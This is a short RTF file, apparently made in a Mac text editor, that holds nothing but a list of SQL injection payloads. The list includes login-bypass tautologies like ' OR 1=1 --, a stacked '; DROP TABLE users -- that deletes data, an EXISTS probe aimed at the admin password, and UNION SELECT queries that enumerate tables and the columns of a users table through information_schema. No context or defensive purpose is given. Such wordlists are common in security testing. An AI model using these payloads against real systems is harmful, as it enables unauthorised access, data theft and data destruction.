{\rtf1\ansi\ansicpg1252\cocoartf2706
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 '\
"\
' OR '1'='1\
" OR "1"="1\
') OR ('1'='1\
") OR ("1"="1\
' OR 1=1 --\
" OR 1=1 --\
') OR 1=1 --\
") OR 1=1 --\
'; DROP TABLE users --\
"; DROP TABLE users --\
' OR username IS NULL; --\
" OR username IS NULL; --\
' OR 1=1--\
" OR 1=1--\
' OR 'x'='x\
" OR "x"="x\
' OR EXISTS(SELECT * FROM users WHERE name = 'admin' AND password LIKE '%')\
" OR EXISTS(SELECT * FROM users WHERE name = 'admin' AND password LIKE '%')\
' OR 1=1 UNION SELECT NULL, table_name FROM information_schema.tables --\
" OR 1=1 UNION SELECT NULL, table_name FROM information_schema.tables --\
' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --\
" UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'users' --\
}